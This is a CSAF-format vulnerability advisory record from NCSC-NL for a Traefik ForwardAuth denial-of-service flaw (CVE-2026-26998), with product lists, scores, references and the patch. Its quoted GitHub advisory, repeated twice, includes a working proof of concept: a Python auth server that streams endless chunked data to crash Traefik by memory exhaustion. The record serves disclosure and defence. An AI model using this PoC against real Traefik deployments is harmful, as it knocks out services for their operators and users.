{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-26998",
        "tracking": {
            "current_release_date": "2026-03-25T18:19:55.169783Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-26998",
            "initial_release_date": "2026-03-04T18:56:50.327808Z",
            "revision_history": [
                {
                    "date": "2026-03-04T18:56:50.327808Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T18:56:54.802483Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-05T00:12:52.936460Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T00:12:56.668279Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T18:39:12.899657Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T18:39:14.936685Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T19:29:01.298051Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T19:29:07.993870Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T22:48:56.796717Z",
                    "number": "9",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-06T00:12:42.297793Z",
                    "number": "10",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-06T00:27:33.823309Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Product Identifiers created (1).| Product Remediations created (2).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-06T00:27:41.694883Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T14:55:39.193429Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-06T14:55:43.586665Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T16:25:08.362008Z",
                    "number": "15",
                    "summary": "Products connected (1).| Product Identifiers created (2).| Products created (1)."
                },
                {
                    "date": "2026-03-06T16:25:11.620510Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T16:38:52.676161Z",
                    "number": "17",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-20T09:42:51.398036Z",
                    "number": "18",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:42:54.889556Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:14:57.929112Z",
                    "number": "20",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (4)."
                },
                {
                    "date": "2026-03-25T18:15:00.265237Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "21"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441150",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_devspaces:3:"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift Dev Spaces"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2485335"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "traefik-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift Dev Spaces"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.11.38",
                                "product": {
                                    "name": "vers:unknown/<2.11.38",
                                    "product_id": "CSAFPID-5763353",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.6.9",
                                "product": {
                                    "name": "vers:unknown/<3.6.9",
                                    "product_id": "CSAFPID-5763354"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.11.38",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.11.38",
                                    "product_id": "CSAFPID-5759450"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.6.9",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.6.9",
                                    "product_id": "CSAFPID-5759451"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.0.0|<3.6.9",
                                "product": {
                                    "name": "vers:unknown/>=3.0.0|<3.6.9",
                                    "product_id": "CSAFPID-5766938",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Traefik"
                    }
                ],
                "category": "vendor",
                "name": "Traefik"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-26998",
            "cwe": {
                "id": "CWE-770",
                "name": "Allocation of Resources Without Limits or Throttling"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Impact\n\nThere is a potential vulnerability in Traefik managing the ForwardAuth middleware responses.\n\nWhen Traefik is configured to use the ForwardAuth middleware, the response body from the authentication server is read entirely into memory without any size limit. There is no `maxResponseBodySize` configuration to restrict the amount of data read from the authentication server response. If the authentication server returns an unexpectedly large or unbounded response body, Traefik will allocate unlimited memory, potentially causing an out-of-memory (OOM) condition that crashes the process.\n\nThis results in a denial of service for all routes served by the affected Traefik instance.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.38\n- https://github.com/traefik/traefik/releases/tag/v3.6.9\n\n## Workarounds\n\nNo workaround available.\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n---\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\n\nThe ForwardAuth middleware reads the entire authentication server response body into memory using io.ReadAll with no size limit. A single HTTP request through a ForwardAuth-protected route can cause the Traefik process to allocate gigabytes of memory and be killed by the OOM killer, resulting in complete denial of service for all routes on the affected entrypoint.\n\n### Details\n\nIn pkg/middlewares/auth/forward.go, line 213:\n\n    body, readError := io.ReadAll(forwardResponse.Body)\n\nWhen the ForwardAuth middleware receives a response from the configured authentication server, it calls io.ReadAll on the response body without any size constraint. If the auth server returns a large or infinite chunked response, Traefik will attempt to buffer the entire body in memory until the process is killed.\n\nTraefik already recognizes this class of risk for the request body direction. When forwardBody: true is configured without maxBodySize, a warning is logged (line 91-94):\n\n    logger.Warn().Msgf(\"ForwardAuth 'maxBodySize' is not configured with 'forwardBody: true', allowing unlimited request body size ...\")\n\nHowever, the response body path has no equivalent protection — no configuration option, no warning, and no default limit. The HTTP client has a 30-second timeout (line 102), but a streaming response can deliver hundreds of megabytes per second within that window.\n\n| Direction | Protection | Code |\n|-----------|-----------|------|\n| Request body to auth server | maxBodySize config + warning log | forward.go:85-95 |\n| Auth server response to Traefik | None | forward.go:213 |\n\n### PoC\n\n1. Create a malicious auth server (auth_infinite.py):\n\n    from http.server import BaseHTTPRequestHandler, HTTPServer\n\n    class InfiniteAuth(BaseHTTPRequestHandler):\n        def do_GET(self):\n            self.send_response(200)\n            self.send_header(\"Transfer-Encoding\", \"chunked\")\n            self.end_headers()\n            chunk = b\"A\" * (64 * 1024)\n            try:\n                while True:\n                    self.wfile.write(f\"{len(chunk):x}\\r\\n\".encode())\n                    self.wfile.write(chunk + b\"\\r\\n\")\n                    self.wfile.flush()\n            except BrokenPipeError:\n                pass\n\n    HTTPServer((\"0.0.0.0\", 9000), InfiniteAuth).serve_forever()\n\n2. Traefik dynamic config (dynamic.yml):\n\n    http:\n      routers:\n        protected:\n          entryPoints: [web]\n          rule: \"PathPrefix('/admin')\"\n          middlewares: [auth]\n          service: whoami\n      middlewares:\n        auth:\n          forwardAuth:\n            address: \"http://auth:9000/auth\"\n      services:\n        whoami:\n          loadBalancer:\n            servers:\n              - url: \"http://whoami:80\"\n\n3. Docker Compose (docker-compose.yml):\n\n    services:\n      traefik:\n        image: traefik:v3.6\n        command:\n          - --entrypoints.web.address=:8000\n          - --providers.file.filename=/etc/traefik/dynamic.yml\n        ports:\n          - \"8000:8000\"\n        volumes:\n          - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n        deploy:\n          resources:\n            limits:\n              memory: 512M\n        depends_on: [auth, whoami]\n      auth:\n        image: python:3.12-slim\n        command: [\"python\", \"/app/auth_infinite.py\"]\n        volumes:\n          - ./auth_infinite.py:/app/auth_infinite.py:ro\n      whoami:\n        image: traefik/whoami:v1.11\n\n4. Reproduce:\n\n    docker compose up -d\n    docker stats --no-stream traefik  # ~14 MiB\n    curl -s -o /dev/null http://localhost:8000/admin\n    docker inspect traefik --format '{{.State.OOMKilled}}'  # true\n    docker inspect traefik --format '{{.State.ExitCode}}'    # 137 (SIGKILL)\n\nObserved results:\n\n| Scenario | Memory |\n|----------|--------|\n| Idle baseline (20 seconds) | 14.8 MiB to 14.8 MiB (no change) |\n| 10 normal requests (4-byte auth response) | 14.8 MiB to 15.8 MiB (+1 MiB) |\n| 1 malicious request (no memory limit) | 98 MiB to 1.43 GiB (14.6x amplification) |\n| 1 malicious request (512MB memory limit) | 14 MiB to OOM kill in less than 3 seconds |\n\nAfter OOM kill, all routes on the entrypoint become unreachable — complete service outage.\n\n### Impact\n\nThis is a denial-of-service vulnerability. Any Traefik instance using the ForwardAuth middleware is affected. A single HTTP request can crash the Traefik process, causing a full outage for all services behind the affected entrypoint.\n\nRealistic attack scenarios include:\n\n- Multi-tenant platforms where tenants configure their own ForwardAuth endpoints (SaaS, PaaS, Kubernetes ingress controllers)\n- Compromised or buggy auth servers that return unexpected large responses\n- Defense in depth: even trusted auth servers should not be able to crash the proxy\n\n### Suggested Fix\n\nApply io.LimitReader to the auth response body, mirroring the existing maxBodySize pattern for request bodies:\n\n    const defaultMaxAuthResponseSize int64 = 1 << 20 // 1 MiB\n    limitedBody := io.LimitReader(forwardResponse.Body, defaultMaxAuthResponseSize)\n    body, readError := io.ReadAll(limitedBody)\n\nOptionally expose a maxResponseBodySize configuration option for operators who need larger auth response bodies.\n\n</details>",
                    "title": "github - https://github.com/advisories/GHSA-fw45-f5q2-2p4x"
                },
                {
                    "category": "description",
                    "text": "## Impact\n\nThere is a potential vulnerability in Traefik managing the ForwardAuth middleware responses.\n\nWhen Traefik is configured to use the ForwardAuth middleware, the response body from the authentication server is read entirely into memory without any size limit. There is no `maxResponseBodySize` configuration to restrict the amount of data read from the authentication server response. If the authentication server returns an unexpectedly large or unbounded response body, Traefik will allocate unlimited memory, potentially causing an out-of-memory (OOM) condition that crashes the process.\n\nThis results in a denial of service for all routes served by the affected Traefik instance.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.38\n- https://github.com/traefik/traefik/releases/tag/v3.6.9\n\n## Workarounds\n\nNo workaround available.\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n---\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\n\nThe ForwardAuth middleware reads the entire authentication server response body into memory using io.ReadAll with no size limit. A single HTTP request through a ForwardAuth-protected route can cause the Traefik process to allocate gigabytes of memory and be killed by the OOM killer, resulting in complete denial of service for all routes on the affected entrypoint.\n\n### Details\n\nIn pkg/middlewares/auth/forward.go, line 213:\n\n    body, readError := io.ReadAll(forwardResponse.Body)\n\nWhen the ForwardAuth middleware receives a response from the configured authentication server, it calls io.ReadAll on the response body without any size constraint. If the auth server returns a large or infinite chunked response, Traefik will attempt to buffer the entire body in memory until the process is killed.\n\nTraefik already recognizes this class of risk for the request body direction. When forwardBody: true is configured without maxBodySize, a warning is logged (line 91-94):\n\n    logger.Warn().Msgf(\"ForwardAuth 'maxBodySize' is not configured with 'forwardBody: true', allowing unlimited request body size ...\")\n\nHowever, the response body path has no equivalent protection — no configuration option, no warning, and no default limit. The HTTP client has a 30-second timeout (line 102), but a streaming response can deliver hundreds of megabytes per second within that window.\n\n| Direction | Protection | Code |\n|-----------|-----------|------|\n| Request body to auth server | maxBodySize config + warning log | forward.go:85-95 |\n| Auth server response to Traefik | None | forward.go:213 |\n\n### PoC\n\n1. Create a malicious auth server (auth_infinite.py):\n\n    from http.server import BaseHTTPRequestHandler, HTTPServer\n\n    class InfiniteAuth(BaseHTTPRequestHandler):\n        def do_GET(self):\n            self.send_response(200)\n            self.send_header(\"Transfer-Encoding\", \"chunked\")\n            self.end_headers()\n            chunk = b\"A\" * (64 * 1024)\n            try:\n                while True:\n                    self.wfile.write(f\"{len(chunk):x}\\r\\n\".encode())\n                    self.wfile.write(chunk + b\"\\r\\n\")\n                    self.wfile.flush()\n            except BrokenPipeError:\n                pass\n\n    HTTPServer((\"0.0.0.0\", 9000), InfiniteAuth).serve_forever()\n\n2. Traefik dynamic config (dynamic.yml):\n\n    http:\n      routers:\n        protected:\n          entryPoints: [web]\n          rule: \"PathPrefix('/admin')\"\n          middlewares: [auth]\n          service: whoami\n      middlewares:\n        auth:\n          forwardAuth:\n            address: \"http://auth:9000/auth\"\n      services:\n        whoami:\n          loadBalancer:\n            servers:\n              - url: \"http://whoami:80\"\n\n3. Docker Compose (docker-compose.yml):\n\n    services:\n      traefik:\n        image: traefik:v3.6\n        command:\n          - --entrypoints.web.address=:8000\n          - --providers.file.filename=/etc/traefik/dynamic.yml\n        ports:\n          - \"8000:8000\"\n        volumes:\n          - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n        deploy:\n          resources:\n            limits:\n              memory: 512M\n        depends_on: [auth, whoami]\n      auth:\n        image: python:3.12-slim\n        command: [\"python\", \"/app/auth_infinite.py\"]\n        volumes:\n          - ./auth_infinite.py:/app/auth_infinite.py:ro\n      whoami:\n        image: traefik/whoami:v1.11\n\n4. Reproduce:\n\n    docker compose up -d\n    docker stats --no-stream traefik  # ~14 MiB\n    curl -s -o /dev/null http://localhost:8000/admin\n    docker inspect traefik --format '{{.State.OOMKilled}}'  # true\n    docker inspect traefik --format '{{.State.ExitCode}}'    # 137 (SIGKILL)\n\nObserved results:\n\n| Scenario | Memory |\n|----------|--------|\n| Idle baseline (20 seconds) | 14.8 MiB to 14.8 MiB (no change) |\n| 10 normal requests (4-byte auth response) | 14.8 MiB to 15.8 MiB (+1 MiB) |\n| 1 malicious request (no memory limit) | 98 MiB to 1.43 GiB (14.6x amplification) |\n| 1 malicious request (512MB memory limit) | 14 MiB to OOM kill in less than 3 seconds |\n\nAfter OOM kill, all routes on the entrypoint become unreachable — complete service outage.\n\n### Impact\n\nThis is a denial-of-service vulnerability. Any Traefik instance using the ForwardAuth middleware is affected. A single HTTP request can crash the Traefik process, causing a full outage for all services behind the affected entrypoint.\n\nRealistic attack scenarios include:\n\n- Multi-tenant platforms where tenants configure their own ForwardAuth endpoints (SaaS, PaaS, Kubernetes ingress controllers)\n- Compromised or buggy auth servers that return unexpected large responses\n- Defense in depth: even trusted auth servers should not be able to crash the proxy\n\n### Suggested Fix\n\nApply io.LimitReader to the auth response body, mirroring the existing maxBodySize pattern for request bodies:\n\n    const defaultMaxAuthResponseSize int64 = 1 << 20 // 1 MiB\n    limitedBody := io.LimitReader(forwardResponse.Body, defaultMaxAuthResponseSize)\n    body, readError := io.ReadAll(limitedBody)\n\nOptionally expose a maxResponseBodySize configuration option for operators who need larger auth response bodies.\n\n</details>",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-fw45-f5q2-2p4x.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.38 and 3.6.9, there is a potential vulnerability in Traefik managing the ForwardAuth middleware responses. When Traefik is configured to use the ForwardAuth middleware, the response body from the authentication server is read entirely into memory without any size limit. There is no maxResponseBodySize configuration to restrict the amount of data read from the authentication server response. If the authentication server returns an unexpectedly large or unbounded response body, Traefik will allocate unlimited memory, potentially causing an out-of-memory (OOM) condition that crashes the process. This results in a denial of service for all routes served by the affected Traefik instance. This issue has been patched in versions 2.11.38 and 3.6.9.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-26998"
                },
                {
                    "category": "description",
                    "text": "Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.38 and 3.6.9, there is a potential vulnerability in Traefik managing the ForwardAuth middleware responses. When Traefik is configured to use the ForwardAuth middleware, the response body from the authentication server is read entirely into memory without any size limit. There is no maxResponseBodySize configuration to restrict the amount of data read from the authentication server response. If the authentication server returns an unexpectedly large or unbounded response body, Traefik will allocate unlimited memory, potentially causing an out-of-memory (OOM) condition that crashes the process. This results in a denial of service for all routes served by the affected Traefik instance. This issue has been patched in versions 2.11.38 and 3.6.9.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-26998"
                },
                {
                    "category": "description",
                    "text": "No description is available for this CVE.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-26998"
                },
                {
                    "category": "description",
                    "text": "Traefik has unbounded io.ReadAll on auth server response body that causes OOM DOS in github.com/traefik/traefik",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4593.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00027",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.1",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent EPSS score, There is cwe data available from source Github, There is product_remediation data available from source Redhat",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 2\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5759450",
                    "CSAFPID-5759451",
                    "CSAFPID-5763353",
                    "CSAFPID-5763354",
                    "CSAFPID-1441150",
                    "CSAFPID-2485335",
                    "CSAFPID-5766938"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-fw45-f5q2-2p4x"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-fw45-f5q2-2p4x"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-fw45-f5q2-2p4x.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/26xxx/CVE-2026-26998.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26998.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4593.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/security/advisories/GHSA-fw45-f5q2-2p4x"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/releases/tag/v2.11.38"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/releases/tag/v3.6.9"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-fw45-f5q2-2p4x"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26998"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-26998"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-1441150",
                        "CSAFPID-2485335"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 4.4,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-1441150",
                        "CSAFPID-2485335",
                        "CSAFPID-5759450",
                        "CSAFPID-5759451",
                        "CSAFPID-5763353",
                        "CSAFPID-5763354",
                        "CSAFPID-5766938"
                    ]
                }
            ],
            "title": "CVE-2026-26998"
        }
    ]
}